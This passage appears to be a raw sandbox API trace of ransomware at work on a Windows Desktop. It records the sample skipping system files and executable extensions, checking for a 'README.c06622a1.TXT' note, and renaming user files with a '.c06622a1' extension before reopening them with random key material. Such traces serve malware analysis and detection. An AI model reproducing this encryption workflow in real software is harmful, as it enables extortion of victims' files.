returned 1 [0156.343] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20145cb0, ftCreationTime.dwHighDateTime=0x1d5e746, ftLastAccessTime.dwLowDateTime=0x657c7630, ftLastAccessTime.dwHighDateTime=0x1d5deda, ftLastWriteTime.dwLowDateTime=0x657c7630, ftLastWriteTime.dwHighDateTime=0x1d5deda, nFileSizeHigh=0x0, nFileSizeLow=0x6056, dwReserved0=0x0, dwReserved1=0x0, cFileName="x7ur2.m4a", cAlternateFileName="")) returned 1 [0156.343] _wcsicmp (_Str1="x7ur2.m4a", _Str2="README.c06622a1.TXT") returned 6 [0156.343] wcsstr (_Str="x7ur2.m4a", _SubStr="README") returned 0x0 [0156.343] _wcsicmp (_Str1="autorun.inf", _Str2="x7ur2.m4a") returned -23 [0156.343] wcslen (_String="autorun.inf") returned 0xb [0156.343] _wcsicmp (_Str1="boot.ini", _Str2="x7ur2.m4a") returned -22 [0156.343] wcslen (_String="boot.ini") returned 0x8 [0156.343] _wcsicmp (_Str1="bootfont.bin", _Str2="x7ur2.m4a") returned -22 [0156.343] wcslen (_String="bootfont.bin") returned 0xc [0156.344] _wcsicmp (_Str1="bootsect.bak", _Str2="x7ur2.m4a") returned -22 [0156.344] wcslen (_String="bootsect.bak") returned 0xc [0156.344] _wcsicmp (_Str1="desktop.ini", _Str2="x7ur2.m4a") returned -20 [0156.344] wcslen (_String="desktop.ini") returned 0xb [0156.344] _wcsicmp (_Str1="iconcache.db", _Str2="x7ur2.m4a") returned -15 [0156.344] wcslen (_String="iconcache.db") returned 0xc [0156.344] _wcsicmp (_Str1="ntldr", _Str2="x7ur2.m4a") returned -10 [0156.344] wcslen (_String="ntldr") returned 0x5 [0156.344] _wcsicmp (_Str1="ntuser.dat", _Str2="x7ur2.m4a") returned -10 [0156.344] wcslen (_String="ntuser.dat") returned 0xa [0156.344] _wcsicmp (_Str1="ntuser.dat.log", _Str2="x7ur2.m4a") returned -10 [0156.344] wcslen (_String="ntuser.dat.log") returned 0xe [0156.344] _wcsicmp (_Str1="ntuser.ini", _Str2="x7ur2.m4a") returned -10 [0156.344] wcslen (_String="ntuser.ini") returned 0xa [0156.344] _wcsicmp (_Str1="thumbs.db", _Str2="x7ur2.m4a") returned -4 [0156.344] wcslen (_String="thumbs.db") returned 0x9 [0156.344] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0156.344] wcslen (_String="386") returned 0x3 [0156.344] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0156.344] wcslen (_String="adv") returned 0x3 [0156.344] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0156.344] wcslen (_String="ani") returned 0x3 [0156.344] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0156.344] wcslen (_String="bat") returned 0x3 [0156.344] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0156.344] wcslen (_String="bin") returned 0x3 [0156.344] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0156.344] wcslen (_String="cab") returned 0x3 [0156.344] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0156.344] wcslen (_String="cmd") returned 0x3 [0156.344] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0156.344] wcslen (_String="com") returned 0x3 [0156.344] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0156.344] wcslen (_String="cpl") returned 0x3 [0156.344] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0156.345] wcslen (_String="cur") returned 0x3 [0156.345] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0156.345] wcslen (_String="deskthemepack") returned 0xd [0156.345] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0156.345] wcslen (_String="diagcab") returned 0x7 [0156.345] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0156.345] wcslen (_String="diagcfg") returned 0x7 [0156.345] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0156.345] wcslen (_String="diagpkg") returned 0x7 [0156.345] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0156.345] wcslen (_String="dll") returned 0x3 [0156.345] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0156.345] wcslen (_String="drv") returned 0x3 [0156.345] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0156.345] wcslen (_String="exe") returned 0x3 [0156.345] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0156.345] wcslen (_String="hlp") returned 0x3 [0156.345] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0156.345] wcslen (_String="icl") returned 0x3 [0156.345] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0156.345] wcslen (_String="icns") returned 0x4 [0156.345] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0156.345] wcslen (_String="ico") returned 0x3 [0156.345] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0156.345] wcslen (_String="ics") returned 0x3 [0156.345] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0156.345] wcslen (_String="idx") returned 0x3 [0156.345] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0156.345] wcslen (_String="ldf") returned 0x3 [0156.345] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0156.345] wcslen (_String="lnk") returned 0x3 [0156.345] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0156.345] wcslen (_String="mod") returned 0x3 [0156.345] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0156.345] wcslen (_String="mpa") returned 0x3 [0156.346] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0156.346] wcslen (_String="msc") returned 0x3 [0156.346] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0156.346] wcslen (_String="msp") returned 0x3 [0156.346] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0156.346] wcslen (_String="msstyles") returned 0x8 [0156.346] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0156.346] wcslen (_String="msu") returned 0x3 [0156.346] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0156.346] wcslen (_String="nls") returned 0x3 [0156.346] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0156.346] wcslen (_String="nomedia") returned 0x7 [0156.346] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0156.346] wcslen (_String="ocx") returned 0x3 [0156.346] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0156.346] wcslen (_String="prf") returned 0x3 [0156.346] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0156.346] wcslen (_String="ps1") returned 0x3 [0156.346] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0156.346] wcslen (_String="rom") returned 0x3 [0156.346] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0156.346] wcslen (_String="rtp") returned 0x3 [0156.346] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0156.346] wcslen (_String="scr") returned 0x3 [0156.346] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0156.346] wcslen (_String="shs") returned 0x3 [0156.346] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0156.346] wcslen (_String="spl") returned 0x3 [0156.346] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0156.346] wcslen (_String="sys") returned 0x3 [0156.346] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0156.346] wcslen (_String="theme") returned 0x5 [0156.346] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0156.346] wcslen (_String="themepack") returned 0x9 [0156.346] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0156.346] wcslen (_String="wpx") returned 0x3 [0156.346] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0156.347] wcslen (_String="lock") returned 0x4 [0156.347] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0156.347] wcslen (_String="key") returned 0x3 [0156.347] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0156.347] wcslen (_String="hta") returned 0x3 [0156.347] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0156.347] wcslen (_String="msi") returned 0x3 [0156.347] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0156.347] wcslen (_String="pdb") returned 0x3 [0156.347] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0156.347] wcslen (_String="sqlite") returned 0x6 [0156.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.347] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.347] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.347] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.347] wcscpy (in: _Dest=0x208e74, _Source="x7ur2.m4a" | out: _Dest="x7ur2.m4a") returned="x7ur2.m4a" [0156.347] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a", dwFileAttributes=0x80) returned 1 [0156.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x7ur2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0156.360] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.360] ReadFile (in: hFile=0x1d0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.361] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x6d81f736 [0156.361] RtlComputeCrc32 (PartialCrc=0xf736, Buffer=0x32ec24, Length=0x80) returned 0xda1c82d3 [0156.361] RtlComputeCrc32 (PartialCrc=0x82d3, Buffer=0x32ec24, Length=0x80) returned 0x4f6ac279 [0156.361] RtlComputeCrc32 (PartialCrc=0xc279, Buffer=0x32ec24, Length=0x80) returned 0xbb4fcdcc [0156.361] RtlComputeCrc32 (PartialCrc=0xcdcc, Buffer=0x32ec24, Length=0x80) returned 0x4a8f239 [0156.361] CloseHandle (hObject=0x1d0) returned 1 [0156.361] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.361] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a" [0156.361] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a") returned 0x33 [0156.361] wcscpy (in: _Dest=0x218e8e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.361] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x7ur2.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x7ur2.m4a.c06622a1"), dwFlags=0x8) returned 1 [0156.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x7ur2.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x7ur2.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0156.436] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.436] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d17ef0c [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68840082 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x11587447 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x26b7f691 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x721fed55 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc692e06 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4478d592 [0156.440] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47e1c822 [0156.443] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x914b53f [0156.443] RtlComputeCrc32 (PartialCrc=0xb53f, Buffer=0x710094, Length=0x80) returned 0xcd671c7c [0156.443] RtlComputeCrc32 (PartialCrc=0x1c7c, Buffer=0x710094, Length=0x80) returned 0x6e358c2d [0156.443] RtlComputeCrc32 (PartialCrc=0x8c2d, Buffer=0x710094, Length=0x80) returned 0x232f916c [0156.443] RtlComputeCrc32 (PartialCrc=0x916c, Buffer=0x710094, Length=0x80) returned 0xa9b7c32d [0156.443] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.444] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.444] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.444] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x966a1220, ftCreationTime.dwHighDateTime=0x1d5e600, ftLastAccessTime.dwLowDateTime=0x9eb2e900, ftLastAccessTime.dwHighDateTime=0x1d5e10c, ftLastWriteTime.dwLowDateTime=0x9eb2e900, ftLastWriteTime.dwHighDateTime=0x1d5e10c, nFileSizeHigh=0x0, nFileSizeLow=0x1147d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xDRDDFHj0R3Sh.pdf", cAlternateFileName="XDRDDF~1.PDF")) returned 1 [0156.444] _wcsicmp (_Str1="xDRDDFHj0R3Sh.pdf", _Str2="README.c06622a1.TXT") returned 6 [0156.444] wcsstr (_Str="xDRDDFHj0R3Sh.pdf", _SubStr="README") returned 0x0 [0156.444] _wcsicmp (_Str1="autorun.inf", _Str2="xDRDDFHj0R3Sh.pdf") returned -23 [0156.444] wcslen (_String="autorun.inf") returned 0xb [0156.444] _wcsicmp (_Str1="boot.ini", _Str2="xDRDDFHj0R3Sh.pdf") returned -22 [0156.444] wcslen (_String="boot.ini") returned 0x8 [0156.444] _wcsicmp (_Str1="bootfont.bin", _Str2="xDRDDFHj0R3Sh.pdf") returned -22 [0156.444] wcslen (_String="bootfont.bin") returned 0xc [0156.444] _wcsicmp (_Str1="bootsect.bak", _Str2="xDRDDFHj0R3Sh.pdf") returned -22 [0156.444] wcslen (_String="bootsect.bak") returned 0xc [0156.444] _wcsicmp (_Str1="desktop.ini", _Str2="xDRDDFHj0R3Sh.pdf") returned -20 [0156.444] wcslen (_String="desktop.ini") returned 0xb [0156.444] _wcsicmp (_Str1="iconcache.db", _Str2="xDRDDFHj0R3Sh.pdf") returned -15 [0156.444] wcslen (_String="iconcache.db") returned 0xc [0156.444] _wcsicmp (_Str1="ntldr", _Str2="xDRDDFHj0R3Sh.pdf") returned -10 [0156.444] wcslen (_String="ntldr") returned 0x5 [0156.444] _wcsicmp (_Str1="ntuser.dat", _Str2="xDRDDFHj0R3Sh.pdf") returned -10 [0156.444] wcslen (_String="ntuser.dat") returned 0xa [0156.444] _wcsicmp (_Str1="ntuser.dat.log", _Str2="xDRDDFHj0R3Sh.pdf") returned -10 [0156.444] wcslen (_String="ntuser.dat.log") returned 0xe [0156.444] _wcsicmp (_Str1="ntuser.ini", _Str2="xDRDDFHj0R3Sh.pdf") returned -10 [0156.444] wcslen (_String="ntuser.ini") returned 0xa [0156.444] _wcsicmp (_Str1="thumbs.db", _Str2="xDRDDFHj0R3Sh.pdf") returned -4 [0156.444] wcslen (_String="thumbs.db") returned 0x9 [0156.444] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0156.445] wcslen (_String="386") returned 0x3 [0156.445] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0156.445] wcslen (_String="adv") returned 0x3 [0156.445] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0156.445] wcslen (_String="ani") returned 0x3 [0156.445] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0156.445] wcslen (_String="bat") returned 0x3 [0156.445] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0156.445] wcslen (_String="bin") returned 0x3 [0156.445] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0156.445] wcslen (_String="cab") returned 0x3 [0156.445] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0156.445] wcslen (_String="cmd") returned 0x3 [0156.445] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0156.445] wcslen (_String="com") returned 0x3 [0156.445] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0156.445] wcslen (_String="cpl") returned 0x3 [0156.445] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0156.445] wcslen (_String="cur") returned 0x3 [0156.445] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0156.445] wcslen (_String="deskthemepack") returned 0xd [0156.445] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0156.445] wcslen (_String="diagcab") returned 0x7 [0156.445] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0156.445] wcslen (_String="diagcfg") returned 0x7 [0156.445] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0156.445] wcslen (_String="diagpkg") returned 0x7 [0156.445] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0156.445] wcslen (_String="dll") returned 0x3 [0156.445] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0156.445] wcslen (_String="drv") returned 0x3 [0156.446] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0156.446] wcslen (_String="exe") returned 0x3 [0156.446] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0156.446] wcslen (_String="hlp") returned 0x3 [0156.446] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0156.446] wcslen (_String="icl") returned 0x3 [0156.446] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0156.446] wcslen (_String="icns") returned 0x4 [0156.446] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0156.446] wcslen (_String="ico") returned 0x3 [0156.446] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0156.446] wcslen (_String="ics") returned 0x3 [0156.446] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0156.446] wcslen (_String="idx") returned 0x3 [0156.446] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0156.446] wcslen (_String="ldf") returned 0x3 [0156.446] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0156.446] wcslen (_String="lnk") returned 0x3 [0156.446] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0156.446] wcslen (_String="mod") returned 0x3 [0156.446] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0156.446] wcslen (_String="mpa") returned 0x3 [0156.446] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0156.446] wcslen (_String="msc") returned 0x3 [0156.446] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0156.446] wcslen (_String="msp") returned 0x3 [0156.446] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0156.446] wcslen (_String="msstyles") returned 0x8 [0156.446] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0156.446] wcslen (_String="msu") returned 0x3 [0156.446] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0156.446] wcslen (_String="nls") returned 0x3 [0156.446] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0156.447] wcslen (_String="nomedia") returned 0x7 [0156.447] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0156.447] wcslen (_String="ocx") returned 0x3 [0156.447] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0156.447] wcslen (_String="prf") returned 0x3 [0156.447] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0156.447] wcslen (_String="ps1") returned 0x3 [0156.447] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0156.447] wcslen (_String="rom") returned 0x3 [0156.447] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0156.447] wcslen (_String="rtp") returned 0x3 [0156.447] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0156.447] wcslen (_String="scr") returned 0x3 [0156.447] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0156.447] wcslen (_String="shs") returned 0x3 [0156.447] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0156.447] wcslen (_String="spl") returned 0x3 [0156.447] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0156.447] wcslen (_String="sys") returned 0x3 [0156.447] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0156.447] wcslen (_String="theme") returned 0x5 [0156.447] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0156.447] wcslen (_String="themepack") returned 0x9 [0156.447] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0156.447] wcslen (_String="wpx") returned 0x3 [0156.447] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0156.447] wcslen (_String="lock") returned 0x4 [0156.447] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0156.447] wcslen (_String="key") returned 0x3 [0156.447] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0156.447] wcslen (_String="hta") returned 0x3 [0156.447] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0156.447] wcslen (_String="msi") returned 0x3 [0156.447] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0156.448] wcslen (_String="pdb") returned 0x3 [0156.448] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0156.448] wcslen (_String="sqlite") returned 0x6 [0156.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.448] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.448] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.448] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.448] wcscpy (in: _Dest=0x208e74, _Source="xDRDDFHj0R3Sh.pdf" | out: _Dest="xDRDDFHj0R3Sh.pdf") returned="xDRDDFHj0R3Sh.pdf" [0156.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf", dwFileAttributes=0x80) returned 1 [0156.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdrddfhj0r3sh.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0156.448] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.448] ReadFile (in: hFile=0x1bc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.449] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x69fecd1b [0156.449] RtlComputeCrc32 (PartialCrc=0xcd1b, Buffer=0x32ec24, Length=0x80) returned 0x1351379 [0156.449] RtlComputeCrc32 (PartialCrc=0x1379, Buffer=0x32ec24, Length=0x80) returned 0x89bf811 [0156.449] RtlComputeCrc32 (PartialCrc=0xf811, Buffer=0x32ec24, Length=0x80) returned 0x9379818d [0156.449] RtlComputeCrc32 (PartialCrc=0x818d, Buffer=0x32ec24, Length=0x80) returned 0x3baafb26 [0156.449] CloseHandle (hObject=0x1bc) returned 1 [0156.449] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.449] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf" [0156.449] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf") returned 0x3b [0156.449] wcscpy (in: _Dest=0x218e9e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.449] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdrddfhj0r3sh.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdrddfhj0r3sh.pdf.c06622a1"), dwFlags=0x8) returned 1 [0156.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xDRDDFHj0R3Sh.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdrddfhj0r3sh.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0156.452] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.452] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ab9bec5 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25723e02 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79d509f8 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54746484 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3115b758 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31057e4f [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4504d8f7 [0156.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc2451e0 [0156.462] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x527cc4c6 [0156.462] 